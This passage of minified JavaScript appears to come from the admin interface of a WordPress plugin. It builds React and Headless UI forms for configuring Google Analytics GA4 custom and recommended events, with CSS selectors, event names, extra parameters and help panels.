e=null!==D.activeOptionIndex?D.options[D.activeOptionIndex]:null;f.current!==e&&(f.current=e)})),ut((()=>{m.dataRef.current=D}),[D]),la([D.buttonRef,D.inputRef,D.optionsRef],(()=>Y.closeCombobox()),0===D.comboboxState);let h=(0,r.useMemo)((()=>({open:0===D.comboboxState,disabled:l,activeIndex:D.activeOptionIndex,activeOption:null===D.activeOptionIndex?null:D.options[D.activeOptionIndex].dataRef.current.value,value:d})),[D,l,d]),I=ct((e=>{let t=D.options.find((t=>t.id===e));t&&A(t.dataRef.current.value)})),C=ct((()=>{if(null!==D.activeOptionIndex){let{dataRef:e,id:t}=D.options[D.activeOptionIndex];A(e.current.value),Y.goToOption(Ka.Specific,t)}})),z=ct((()=>{N({type:0}),y.current=!0})),b=ct((()=>{N({type:1}),y.current=!1})),O=ct(((e,t,r)=>(y.current=!1,e===Ka.Specific?N({type:2,focus:Ka.Specific,id:t,trigger:r}):N({type:2,focus:e,trigger:r})))),v=ct(((e,t)=>(N({type:3,id:e,dataRef:t}),()=>{var t;(null==(t=f.current)?void 0:t.id)===e&&(y.current=!0),N({type:4,id:e})}))),k=ct((e=>(N({type:5,id:e}),()=>N({type:5,id:null})))),A=ct((e=>qe(D.mode,{0:()=>null==j?void 0:j(e),1(){let t=D.value.slice(),r=t.findIndex((t=>E(t,e)));return-1===r?t.push(e):t.splice(r,1),null==j?void 0:j(t)}}))),Y=(0,r.useMemo)((()=>({onChange:A,registerOption:v,registerLabel:k,goToOption:O,closeCombobox:b,openCombobox:z,selectActiveOption:C,selectOption:I})),[]),U=null===t?{}:{ref:t},Q=(0,r.useRef)(null),G=pt();return(0,r.useEffect)((()=>{Q.current&&void 0!==i&&G.addEventListener(Q.current,"reset",(()=>{A(i)}))}),[Q,A]),r.createElement(ci.Provider,{value:Y},r.createElement(Mi.Provider,{value:D},r.createElement(rt,{value:qe(D.comboboxState,{0:et.Open,1:et.Closed})},null!=u&&null!=d&&$a({[u]:d}).map((([e,t],a)=>r.createElement(wr,{features:xr.Hidden,ref:0===a?e=>{var t;Q.current=null!=(t=null==e?void 0:e.closest("form"))?t:null}:void 0,...Xe({key:e,as:"input",type:"hidden",hidden:!0,readOnly:!0,name:e,value:t})}))),We({ourProps:U,theirProps:M,slot:h,defaultTag:mi,name:"Combobox"}))))})),pi=Je((function(e,t){var a;let i=di("Combobox.Button"),n=Li("Combobox.Button"),u=dt(i.buttonRef,t),s=gr(),{id:l=`headlessui-combobox-button-${s}`,...o}=e,c=pt(),L=ct((e=>{switch(e.key){case yr.ArrowDown:return e.preventDefault(),e.stopPropagation(),1===i.comboboxState&&n.openCombobox(),c.nextFrame((()=>{var e;return null==(e=i.inputRef.current)?void 0:e.focus({preventScroll:!0})}));case yr.ArrowUp:return e.preventDefault(),e.stopPropagation(),1===i.comboboxState&&(n.openCombobox(),c.nextFrame((()=>{i.value||n.goToOption(Ka.Last)}))),c.nextFrame((()=>{var e;return null==(e=i.inputRef.current)?void 0:e.focus({preventScroll:!0})}));case yr.Escape:return 0!==i.comboboxState?void 0:(e.preventDefault(),i.optionsRef.current&&!i.optionsPropsRef.current.static&&e.stopPropagation(),n.closeCombobox(),c.nextFrame((()=>{var e;return null==(e=i.inputRef.current)?void 0:e.focus({preventScroll:!0})})));default:return}})),M=ct((e=>{if(pr(e.currentTarget))return e.preventDefault();0===i.comboboxState?n.closeCombobox():(e.preventDefault(),n.openCombobox()),c.nextFrame((()=>{var e;return null==(e=i.inputRef.current)?void 0:e.focus({preventScroll:!0})}))})),d=Va((()=>{if(i.labelId)return[i.labelId,l].join(" ")}),[i.labelId,l]),j=(0,r.useMemo)((()=>({open:0===i.comboboxState,disabled:i.disabled,value:i.value})),[i]);return We({ourProps:{ref:u,id:l,type:Xa(e,i.buttonRef),tabIndex:-1,"aria-haspopup":"listbox","aria-controls":null==(a=i.optionsRef.current)?void 0:a.id,"aria-expanded":i.disabled?void 0:0===i.comboboxState,"aria-labelledby":d,disabled:i.disabled,onClick:M,onKeyDown:L},theirProps:o,slot:j,defaultTag:"button",name:"Combobox.Button"})})),gi=Je((function(e,t){var a,i,n,u;let s=gr(),{id:l=`headlessui-combobox-input-${s}`,onChange:o,displayValue:c,type:L="text",...M}=e,d=di("Combobox.Input"),j=Li("Combobox.Input"),m=dt(d.inputRef,t),N=(0,r.useRef)(!1),y=pt(),p=function(){var e;return"function"==typeof c&&void 0!==d.value?null!=(e=c(d.value))?e:"":"string"==typeof d.value?d.value:""}();Yr((([e,t],[r,a])=>{N.current||d.inputRef.current&&(0===a&&1===t||e!==r)&&(d.inputRef.current.value=e)}),[p,d.comboboxState]),Yr((([e],[t])=>{if(0===e&&1===t){let e=d.inputRef.current;if(!e)return;let t=e.value,{selectionStart:r,selectionEnd:a,selectionDirection:i}=e;e.value="",e.value=t,null!==i?e.setSelectionRange(r,a,i):e.setSelectionRange(r,a)}}),[d.comboboxState]);let g=(0,r.useRef)(!1),x=ct((()=>{g.current=!0})),w=ct((()=>{setTimeout((()=>{g.current=!1}))})),T=ct((e=>{switch(N.current=!0,e.key){case yr.Backspace:case yr.Delete:if(0!==d.mode||!d.nullable)return;let t=e.currentTarget;y.requestAnimationFrame((()=>{""===t.value&&(j.onChange(null),d.optionsRef.current&&(d.optionsRef.current.scrollTop=0),j.goToOption(Ka.Nothing))}));break;case yr.Enter:if(N.current=!1,0!==d.comboboxState||g.current)return;if(e.preventDefault(),e.stopPropagation(),null===d.activeOptionIndex)return void j.closeCombobox();j.selectActiveOption(),0===d.mode&&j.closeCombobox();break;case yr.ArrowDown:return N.current=!1,e.preventDefault(),e.stopPropagation(),qe(d.comboboxState,{0:()=>{j.goToOption(Ka.Next)},1:()=>{j.openCombobox()}});case yr.ArrowUp:return N.current=!1,e.preventDefault(),e.stopPropagation(),qe(d.comboboxState,{0:()=>{j.goToOption(Ka.Previous)},1:()=>{j.openCombobox(),y.nextFrame((()=>{d.value||j.goToOption(Ka.Last)}))}});case yr.Home:if(e.shiftKey)break;return N.current=!1,e.preventDefault(),e.stopPropagation(),j.goToOption(Ka.First);case yr.PageUp:return N.current=!1,e.preventDefault(),e.stopPropagation(),j.goToOption(Ka.First);case yr.End:if(e.shiftKey)break;return N.current=!1,e.preventDefault(),e.stopPropagation(),j.goToOption(Ka.Last);case yr.PageDown:return N.current=!1,e.preventDefault(),e.stopPropagation(),j.goToOption(Ka.Last);case yr.Escape:return N.current=!1,0!==d.comboboxState?void 0:(e.preventDefault(),d.optionsRef.current&&!d.optionsPropsRef.current.static&&e.stopPropagation(),j.closeCombobox());case yr.Tab:if(N.current=!1,0!==d.comboboxState)return;0===d.mode&&j.selectActiveOption(),j.closeCombobox()}})),E=ct((e=>{j.openCombobox(),null==o||o(e)})),S=ct((()=>{N.current=!1})),D=Va((()=>{if(d.labelId)return[d.labelId].join(" ")}),[d.labelId]),f=(0,r.useMemo)((()=>({open:0===d.comboboxState,disabled:d.disabled})),[d]);return We({ourProps:{ref:m,id:l,role:"combobox",type:L,"aria-controls":null==(a=d.optionsRef.current)?void 0:a.id,"aria-expanded":d.disabled?void 0:0===d.comboboxState,"aria-activedescendant":null===d.activeOptionIndex||null==(i=d.options[d.activeOptionIndex])?void 0:i.id,"aria-labelledby":D,"aria-autocomplete":"list",defaultValue:null!=(u=null!=(n=e.defaultValue)?n:void 0!==d.defaultValue?null==c?void 0:c(d.defaultValue):null)?u:d.defaultValue,disabled:d.disabled,onCompositionStart:x,onCompositionEnd:w,onKeyDown:T,onChange:E,onBlur:S},theirProps:M,slot:f,defaultTag:"input",name:"Combobox.Input"})})),xi=Je((function(e,t){let a=gr(),{id:i=`headlessui-combobox-label-${a}`,...n}=e,u=di("Combobox.Label"),s=Li("Combobox.Label"),l=dt(u.labelRef,t);ut((()=>s.registerLabel(i)),[i]);let o=ct((()=>{var e;return null==(e=u.inputRef.current)?void 0:e.focus({preventScroll:!0})})),c=(0,r.useMemo)((()=>({open:0===u.comboboxState,disabled:u.disabled})),[u]);return We({ourProps:{ref:l,id:i,onClick:o},theirProps:n,slot:c,defaultTag:"label",name:"Combobox.Label"})})),wi=Je((function(e,t){let a=gr(),{id:i=`headlessui-combobox-options-${a}`,hold:n=!1,...u}=e,s=di("Combobox.Options"),l=dt(s.optionsRef,t),o=tt(),c=null!==o?(o&et.Open)===et.Open:0===s.comboboxState;ut((()=>{var t;s.optionsPropsRef.current.static=null!=(t=e.static)&&t}),[s.optionsPropsRef,e.static]),ut((()=>{s.optionsPropsRef.current.hold=n}),[s.optionsPropsRef,n]),function({container:e,accept:t,walk:a,enabled:i=!0}){let n=(0,r.useRef)(t),u=(0,r.useRef)(a);(0,r.useEffect)((()=>{n.current=t,u.current=a}),[t,a]),ut((()=>{if(!e||!i)return;let t=Tr(e);if(!t)return;let r=n.current,a=u.current,s=Object.assign((e=>r(e)),{acceptNode:r}),l=t.createTreeWalker(e,NodeFilter.SHOW_ELEMENT,s,!1);for(;l.nextNode();)a(l.currentNode)}),[e,i,n,u])}({container:s.optionsRef.current,enabled:0===s.comboboxState,accept:e=>"option"===e.getAttribute("role")?NodeFilter.FILTER_REJECT:e.hasAttribute("role")?NodeFilter.FILTER_SKIP:NodeFilter.FILTER_ACCEPT,walk(e){e.setAttribute("role","none")}});let L=Va((()=>{var e,t;return null!=(t=s.labelId)?t:null==(e=s.buttonRef.current)?void 0:e.id}),[s.labelId,s.buttonRef.current]),M=(0,r.useMemo)((()=>({open:0===s.comboboxState})),[s]);return We({ourProps:{"aria-labelledby":L,role:"listbox","aria-multiselectable":1===s.mode||void 0,id:i,ref:l},theirProps:u,slot:M,defaultTag:"ul",features:Ni,visible:c,name:"Combobox.Options"})})),Ti=Je((function(e,t){var a,i;let n=gr(),{id:u=`headlessui-combobox-option-${n}`,disabled:s=!1,value:l,...o}=e,c=di("Combobox.Option"),L=Li("Combobox.Option"),M=null!==c.activeOptionIndex&&c.options[c.activeOptionIndex].id===u,d=c.isSelected(l),j=(0,r.useRef)(null),m=lt({disabled:s,value:l,domRef:j,textValue:null==(i=null==(a=j.current)?void 0:a.textContent)?void 0:i.toLowerCase()}),N=dt(t,j),y=ct((()=>L.selectOption(u)));ut((()=>L.registerOption(u,m)),[m,u]);let p=(0,r.useRef)(!c.__demoMode);ut((()=>{if(!c.__demoMode)return;let e=mt();return e.requestAnimationFrame((()=>{p.current=!0})),e.dispose}),[]),ut((()=>{if(0!==c.comboboxState||!M||!p.current||0===c.activationTrigger)return;let e=mt();return e.requestAnimationFrame((()=>{var e,t;null==(t=null==(e=j.current)?void 0:e.scrollIntoView)||t.call(e,{block:"nearest"})})),e.dispose}),[j,M,c.comboboxState,c.activationTrigger,c.activeOptionIndex]);let g=ct((e=>{if(s)return e.preventDefault();y(),0===c.mode&&L.closeCombobox(),pa()||/Android/gi.test(window.navigator.userAgent)||requestAnimationFrame((()=>{var e;return null==(e=c.inputRef.current)?void 0:e.focus()}))})),x=ct((()=>{if(s)return L.goToOption(Ka.Nothing);L.goToOption(Ka.Specific,u)})),w=function(){let e=(0,r.useRef)([-1,-1]);return{wasMoved(t){let r=ai(t);return(e.current[0]!==r[0]||e.current[1]!==r[1])&&(e.current=r,!0)},update(t){e.current=ai(t)}}}(),T=ct((e=>w.update(e))),E=ct((e=>{w.wasMoved(e)&&(s||M||L.goToOption(Ka.Specific,u,0))})),S=ct((e=>{w.wasMoved(e)&&(s||M&&(c.optionsPropsRef.current.hold||L.goToOption(Ka.Nothing)))})),D=(0,r.useMemo)((()=>({active:M,selected:d,disabled:s})),[M,d,s]);return We({ourProps:{id:u,ref:N,role:"option",tabIndex:!0===s?void 0:-1,"aria-disabled":!0===s||void 0,"aria-selected":d,disabled:void 0,onClick:g,onFocus:x,onPointerEnter:T,onMouseEnter:T,onPointerMove:E,onMouseMove:E,onPointerLeave:S,onMouseLeave:S},theirProps:o,slot:D,defaultTag:"li",name:"Combobox.Option"})})),Ei=Object.assign(yi,{Input:gi,Button:pi,Label:xi,Options:wi,Option:Ti});const Si=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M10 3a1 1 0 01.707.293l3 3a1 1 0 01-1.414 1.414L10 5.414 7.707 7.707a1 1 0 01-1.414-1.414l3-3A1 1 0 0110 3zm-3.707 9.293a1 1 0 011.414 0L10 14.586l2.293-2.293a1 1 0 011.414 1.414l-3 3a1 1 0 01-1.414 0l-3-3a1 1 0 010-1.414z",clipRule:"evenodd"}))})),Di=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M16.707 5.293a1 1 0 010 1.414l-8 8a1 1 0 01-1.414 0l-4-4a1 1 0 011.414-1.414L8 12.586l7.293-7.293a1 1 0 011.414 0z",clipRule:"evenodd"}))}));function fi(){for(var e=arguments.length,t=new Array(e),r=0;r<e;r++)t[r]=arguments[r];return t.filter(Boolean).join(" ")}function hi(){const t=(0,r.useContext)(Ra),a=Object.keys(t),{eventNameContext:i,setEventContext:n}=(0,r.useContext)(Ga),[u]=n,[s,l]=i,[o,c]=(0,r.useState)(""),L=""===o?a:a.filter((e=>e.toLowerCase().includes(o.toLowerCase())));return(0,r.useEffect)((()=>{s||(l("generate_lead"),u("generate_lead"))}),[]),(0,e.createElement)(Ei,{className:"sm:grid sm:grid-cols-3 sm:gap-4 sm:items-start",as:"fieldset",value:s,onChange:u},(0,e.createElement)(Ei.Label,{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Recommended Event"),(0,e.createElement)("div",{className:"relative mt-1 sm:mt-0 sm:col-span-2"},(0,e.createElement)("div",{className:"max-w-sm_ w-full flex rounded-md shadow-sm"},(0,e.createElement)(Ei.Input,{className:"w-full flex-1 block min-w-0 rounded-md border border-gray-300 bg-white py-2 pl-3 pr-10 shadow-sm focus:border-indigo-500 focus:outline-none focus:ring-1 focus:ring-indigo-500 sm:text-sm",onChange:e=>c(e.target.value),displayValue:e=>e}),(0,e.createElement)(Ei.Button,{className:"absolute inset-y-0 right-0 flex items-center rounded-r-md px-2 focus:outline-none"},(0,e.createElement)(Si,{className:"h-5 w-5 text-gray-400","aria-hidden":"true"}))),L.length>0&&(0,e.createElement)(Ei.Options,{className:"absolute z-10 mt-1 max-h-60 w-full overflow-auto rounded-md bg-white py-1 text-base shadow-lg ring-1 ring-black ring-opacity-5 focus:outline-none sm:text-sm"},L.map((t=>(0,e.createElement)(Ei.Option,{key:t,value:t,className:e=>{let{active:t}=e;return fi("relative cursor-default select-none py-2 pl-3 pr-9",t?"bg-indigo-600 text-white":"text-gray-900")}},(r=>{let{active:a,selected:i}=r;return(0,e.createElement)(e.Fragment,null,(0,e.createElement)("span",{className:fi("block truncate",i&&"font-semibold")},t),i&&(0,e.createElement)("span",{className:fi("absolute inset-y-0 right-0 flex items-center pr-4",a?"text-white":"text-indigo-600")},(0,e.createElement)(Di,{className:"h-5 w-5","aria-hidden":"true"})))})))))))}function Ii(t){let{pKey:r,pValue:a,setProp:i,required:n,type:u,placeholder:s,deleteProp:l,deleteButton:o}=t;return(0,e.createElement)(e.Fragment,null,"items"!=r?(0,e.createElement)("fieldset",{className:"flex flex-1 w-full sm:grid sm:grid-cols-3 sm:gap-4 sm:items-start sm:border-t sm:border-gray-200 sm:pt-5"},(0,e.createElement)("label",{htmlFor:"selectorType",className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"+(1==n?" required":"")},r),(0,e.createElement)("input",{type:u,required:n,name:r,placeholder:s,id:r,value:a,onChange:e=>i(r,"items"==r?"[{}]":e.target.value),className:"flex-1 block col-span-2 w-full focus:ring-indigo-500 focus:border-indigo-500 min-w-0 rounded-none rounded-r-md sm:text-sm border-gray-300"})):"")}const Ci=()=>{const{selectorContext:t}=n().useContext(Ga),[r,a]=t;return(0,e.createElement)(e.Fragment,null,(0,e.createElement)("fieldset",{className:"sm:grid sm:grid-cols-3 sm:gap-4 sm:items-start sm:border-t sm:border-gray-200 sm:pt-5"},(0,e.createElement)("label",{htmlFor:"selector",className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2 required"},"Class or ID Selector"),(0,e.createElement)("div",{className:"mt-1 sm:mt-0 sm:col-span-2"},(0,e.createElement)("div",{className:"w-full flex rounded-md shadow-sm"},(0,e.createElement)("input",{required:!0,type:"text",name:"selector",id:"selector",placeholder:"Full CSS selector (including . and #)",value:r||"",onChange:e=>a(e.target.value),className:"flex-1 block w-full focus:ring-indigo-500 focus:border-indigo-500 min-w-0 rounded-none rounded-r-md sm:text-sm border-gray-300"})))))},zi=t=>{let{currentCustomEvent:r,eventType:a,onClose:i,handleHelpClick:n}=t;return(0,e.createElement)("header",{className:"py-5 pl-10 pr-10 sticky top-0 shadow"},(0,e.createElement)("div",{className:"flex items-start justify-between"},(0,e.createElement)(Ua.Title,{className:"text-2xl font-medium text-gray-900"},r?"Edit":"New"," ",a,(0,e.createElement)("button",{type:"button",onClick:n},(0,e.createElement)(Bt(),{className:"h-6 w-6 ml-2 inline hover:text-brand-primary","aria-hidden":"true"}))),(0,e.createElement)("div",{className:"ml-3 flex h-7 items-center"},(0,e.createElement)("button",{type:"button",className:"rounded-md bg-white text-gray-400 hover:text-gray-500 focus:outline-none focus:ring-2 focus:ring-indigo-500",onClick:i},(0,e.createElement)("span",{className:"sr-only"},"Close panel"),(0,e.createElement)(At,{className:"h-6 w-6","aria-hidden":"true"})))))},bi=t=>{let{onCancel:r}=t;return(0,e.createElement)("footer",{className:"flex flex-shrink-0 justify-end px-4 py-4"},(0,e.createElement)("button",{type:"button",className:"rounded-md border border-gray-300 bg-white py-2 px-4 text-sm font-medium text-gray-700 shadow-sm hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2",onClick:r},"Cancel"),(0,e.createElement)("button",{type:"submit",form:"event-form",className:"ml-4 inline-flex justify-center rounded-md border border-transparent bg-indigo-600 py-2 px-4 text-sm font-medium text-white shadow-sm hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2"},"Save"))},Oi=t=>{let{properties:r,isRecommended:a,recommendedEvents:i,eventName:n,setProp:u,deleteProp:s}=t;return(0,e.createElement)("div",{"data-component":"props-table",className:"flex flex-col bg-gray-50 rounded-50 mt-6 "},(0,e.createElement)("div",{"data-component":"props-list",className:"bg-gray-100 p-2 flex flex-col items-center rounded pb-4"},(0,e.createElement)("table",{className:"min-w-full table-fixed divide-y divide-gray-300"},(0,e.createElement)("thead",{className:"bg-gray-50"},(0,e.createElement)("tr",null,(0,e.createElement)("th",{scope:"col",className:"min-w-[12rem] py-3.5 pr-2 pl-4 text-left text-sm font-semibold text-gray-900"},"Property"),(0,e.createElement)("th",{scope:"col",className:"px-3 py-3.5 text-left text-sm font-semibold text-gray-900"},"Value"),(0,e.createElement)("th",{scope:"col",className:"px-3 py-3.5 text-left text-sm font-semibold text-gray-900"}),(0,e.createElement)("th",{scope:"col",className:"relative py-3.5 pl-3 pr-4 sm:pr-6"},(0,e.createElement)("span",{className:"sr-only"},"Edit")))),(0,e.createElement)("tbody",{className:"bg-white"},Object.entries(r).map((t=>{let[r,l]=t;return(0,e.createElement)(Ha,{key:r,pKey:r,pValue:l,setProp:u,required:a&&i&&i[n][r]?.required,type:a&&i?i[n][r]?.type:"text",placeholder:a&&i?i[n][r]?.placeholder:"",deleteProp:s,deleteButton:!0})})))),0===Object.keys(r).length&&(0,e.createElement)("div",{"data-component":"no-items-placeholder",className:"p-6 w-full flex-1 text-center items-center opacity-90 bg-gray-200 rounded my-4"},"No Items")))},vi=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Custom Event Name"),(0,e.createElement)("span",{className:"block pt-5"},'In the "Custom Event Name" field, enter a descriptive label that reflects the action users take on your website, such as "download_ebook" or "play_video".',(0,e.createElement)("p",{className:"pt-2"},"This label becomes the event's name in Google Analytics GA4, allowing you to track and analyze these specific user interactions."),(0,e.createElement)("p",{className:"pt-2"},"Choose clear and consistent names to simplify your event tracking and reporting."))),ki=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Class or ID Selector"),(0,e.createElement)("span",{className:"block pt-5"},'In the "Class or ID Selector" field, enter the CSS selector that uniquely identifies the webpage element you wish to track, such as a button or link.',(0,e.createElement)("p",{className:"pt-2"},"Use a period (.) for a class or a hash (#) for an ID."),(0,e.createElement)("p",{className:"pt-2"},"For instance, to track clicks on a button with the ID 'purchase', input '#purchase' into this field."),(0,e.createElement)("p",{className:"pt-2"},"This CSS selector enables the plugin to monitor interactions with the specified element and report them as events to Google Analytics GA4.")),(0,e.createElement)("span",{className:"block pt-5 pb-5"},(0,e.createElement)("a",{className:"font-medium text-blue-600 dark:text-blue-500 hover:underline",target:"_blank",href:"https://www.wpgoaltracker.com/dtp7"},"Click here to learn more about how to set the Class or ID Selector."))),Ai=i.p+"images/Placeholders.01211bf7.png",Yi=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Additional Parameters"),(0,e.createElement)("span",{className:"block pt-5"},'The "Additional Properties" section allows you to add extra details to your event, which are sent as parameters with the event to GA4.',(0,e.createElement)("p",{className:"pt-2"},"Each property consists of a key and a value. The key is a simple label describing the data, like 'color' or 'level', while the value is the actual information, such as 'red' or 'hard'."),(0,e.createElement)("p",{className:"pt-2"},"These properties help you segment and analyze your event data more granularly in GA4. For instance, if you're tracking a 'video_play' event, additional properties could include 'video_name' as the key and the actual name of the video as the value."),(0,e.createElement)("p",{className:"pt-2"},"This level of detail can give you better insights into user behavior.")),(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Placeholders (Pro Feature)"),(0,e.createElement)("span",{className:"block pt-5"},'Goal Tracker for Google Analytics Pro allows you to use placeholders in the "Additional Properties" section.',(0,e.createElement)("p",{className:"pt-2"},"This feature is useful when you want to track dynamic data, such as the name of a product or the price of an item."),(0,e.createElement)("p",{className:"italic pt-2"},"If you worked with Liquid Templates this is very similar."),(0,e.createElement)("p",{className:"pt-2"},"Here are a few examples:")),(0,e.createElement)("img",{className:"pt-5",src:Ai}),(0,e.createElement)("span",{className:"block pt-5 pb-5"},(0,e.createElement)("a",{className:"font-medium text-blue-600 dark:text-blue-500 hover:underline",target:"_blank",href:"https://www.wpgoaltracker.com/ciwr"},"Click here to learn more about Placeholders."))),Ui=()=>(0,e.createElement)("div",null,(0,e.createElement)(vi,null),(0,e.createElement)(ki,null),(0,e.createElement)(Yi,null)),Qi=i.p+"images/RecommendedEvent.3efd48cc.png",Gi=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Recommended Events"),(0,e.createElement)("span",{className:"block pt-5"},"Recommended events in GA4 are pre-configured event types that Google Analytics has identified as significant across a wide range of websites and apps.",(0,e.createElement)("p",{className:"pt-2"},"These include common interactions like 'login', 'search', or 'purchase', which many site owners are interested in tracking."),(0,e.createElement)("p",{className:"pt-2"},"By using these standardized events, even if you're not deeply familiar with analytics, you can benefit from Google's expertise in user behavior tracking."),(0,e.createElement)("p",{className:"pt-2"},"This helps ensure that you're collecting the right data in a format that GA4 can use to generate insightful reports, making it easier for you to understand and analyze your users' actions."),(0,e.createElement)("p",{className:"pt-2"},"Recommended events have pre-defined parameters that are sent to GA4. When you choose an recommended event, we will show you the parameters that are associated with that event.")),(0,e.createElement)("img",{className:"pt-5",src:Qi})),(0,e.createElement)(ki,null)),{apiFetch:Pi}=wp,Ri=t=>{let{eventType:a,currentCustomEvent:i,setCurrentCustomEvent:n,updateFunction:u,open:s,setOpen:l}=t;const o=(0,r.useContext)(Ra),{type:c}=(0,r.useContext)(Pa),[L,M]=(0,r.useState)(!1),[d,j]=(0,r.useState)(""),[m,N]=(0,r.useState)(""),[y,p]=(0,r.useState)(""),[g,x]=(0,r.useState)(""),[w,T]=(0,r.useState)(""),[E,S]=(0,r.useState)(""),[D,f]=(0,r.useState)({}),[h,I]=(0,r.useState)(!1),[C,z]=(0,r.useState)(!1),{open:b,setOpenHelpSlider:O,setTitleHelpSlider:v,setComponent:k}=_t();var A;const[Y,U]=(0,r.useState)(!1),[Q,G]=(0,r.useState)(!1),[P,R]=(0,r.useState)(!1),[F,_]=(0,r.useState)(!1);(0,r.useEffect)((()=>{i&&Object.keys(i).length>0?(j(i.selector),x(i.eventName),f(i.props),I(i.isRecommended),z(!!(i.props&&Object.keys(i.props).length>=25)),A=o[i.eventName]):(j(""),x(""),T(""),S(""),f({}),"Recommended Event"===a&&I(1))}),[s]);const q=(e,t)=>{let r={...D};r[e]=t,f(r)};return(0,e.createElement)(Ga.Provider,{value:{eventNameContext:[g,x],customEventNameContext:[m,N],setEventContext:[e=>{A=o[e];const t=[];null!=A&&Object.keys(A).forEach((function(e){t[e]=""})),I(!!A),x(e),f(t)}],selectorContext:[d,j],eventTypeContext:[a,a]}},(0,e.createElement)(Qa.Provider,{value:{openItemsForm:L,setOpenItemsForm:M}},(0,e.createElement)(r.Fragment,null,(0,e.createElement)(vt.Root,{show:s,as:r.Fragment},(0,e.createElement)(Ua,{as:"div",className:"relative z-[999999]",onClose:l},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"ease-in-out duration-500",enterFrom:"opacity-0",enterTo:"opacity-100",leave:"ease-in-out duration-500",leaveFrom:"opacity-100",leaveTo:"opacity-0"},(0,e.createElement)("div",{className:"fixed inset-0 bg-gray-500/75 backdrop-blur-sm transition-opacity"})),(0,e.createElement)("div",{className:"fixed inset-0"}),(0,e.createElement)("div",{className:"fixed inset-0 overflow-hidden"},(0,e.createElement)("div",{className:"absolute inset-0 overflow-hidden"},(0,e.createElement)("div",{className:`pointer-events-none fixed inset-y-0 right-0 flex ${L||b?"w-2/3":"w-1/2"} min-w-[750px] pl-10 transform transition-all ease-in-out duration-500 sm:duration-700`},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"transform transition ease-in-out duration-500 sm:duration-700",enterFrom:"translate-x-full",enterTo:"translate-x-0",leave:"transform transition ease-in-out duration-500 sm:duration-700",leaveFrom:"translate-x-0",leaveTo:"translate-x-full"},(0,e.createElement)(Ua.Panel,{className:"pointer-events-auto flex-1"},(0,e.createElement)("form",{id:"event-form",onSubmit:async function(e){if(e.preventDefault(),"event-form"!==e.target.id)return;U(!0);const t={type:c,selector:d,eventName:g,props:D,isRecommended:h};let r=wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/set_event";i&&(r+="?ID="+i.id);let a=await Pi({path:r,method:"POST",data:{type:c,config:t}});Object.keys(a).length>=3?(R(!1),U(!1),_(!1)):(U(!1),R(!0),_(!0)),G(!0),u(),n({}),l(!1)},className:"flex h-full flex-col divide-y divide-gray-200 bg-white shadow-xl"},(0,e.createElement)("div",{"data-component":"form-wrapper",className:"flex min-h-0 flex-1 flex-col "},(0,e.createElement)(zi,{currentCustomEvent:i,eventType:a,onClose:()=>l(!1),handleHelpClick:()=>{v(a+" Help"),k("Recommended Event"===a?Gi:Ui),O(!0)}}),(0,e.createElement)("div",{"data-component":"main-form",className:"overflow-y-scroll bg-gray-100 p-10 flex-1"},(0,e.createElement)("div",{className:"bg-white w-full p-10 rounded-md"},(0,e.createElement)("div",{className:"p-10 min-h-[410px]"},(0,e.createElement)("div",{"data-component":"fieldset-wrapper",className:"mt-6 sm:mt-5 space-y-6 sm:space-y-5"},"Recommended Event"===a?(0,e.createElement)(hi,null):(0,e.createElement)("div",{className:""},(0,e.createElement)("fieldset",{className:"sm:grid sm:grid-cols-3 sm:gap-4 sm:items-start"},(0,e.createElement)("label",{htmlFor:"selector",className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2 required"},"Custom Event Name"),(0,e.createElement)("div",{className:"mt-1 sm:mt-0 sm:col-span-2"},(0,e.createElement)("div",{className:"w-full flex rounded-md shadow-sm"},(0,e.createElement)("input",{required:!0,type:"text",name:"customEvent",id:"customEvent",placeholder:"custom_event_name  ",maxLength:"40",value:g||"",onChange:e=>x(e.target.value),className:"flex-1 block w-full focus:ring-indigo-500 focus:border-indigo-500 min-w-0 rounded-none rounded-r-md sm:text-sm border-gray-300"}))))),(0,e.createElement)(Ci,null)),"Custom Event"===a||"Recommended Event"===a&&g?(0,e.createElement)(r.Fragment,null,"Recommended Event"===a?(0,e.createElement)("div",{"data-component":"fieldset-wrapper",className:"mt-6 sm:mt-20 space-y-6 sm:space-y-5"},(0,e.createElement)("h3",{className:"text-sm leading-6 font-medium text-gray-600 mt-10 border-b border-gray-200 pb-2 uppercase"},(0,e.createElement)("span",{className:"text-gray-600"})," ","Event"," ",(0,e.createElement)("span",{className:"text-gray-600 text-sm uppercase "},"Properties:")),(0,e.createElement)(r.Fragment,null,Object.entries(D).map((t=>{let[r,a]=t;return(0,e.createElement)(Ii,{key:r,pKey:r,pValue:a,setProp:q,required:!!h&&o[g][r].required,type:h?o[g][r].type:"text",placeholder:h?o[g][r].placeholder:""})})),D&&"items"in D?(0,e.createElement)(Wa,{eventName:g,eventItems:D.items,updateFunction:e=>{let t={...D};t.items=e,f(t)}}):"")):D&&(0,e.createElement)(r.Fragment,null,(0,e.createElement)("div",{className:"mt-2 sm:mt-5 space-y-6 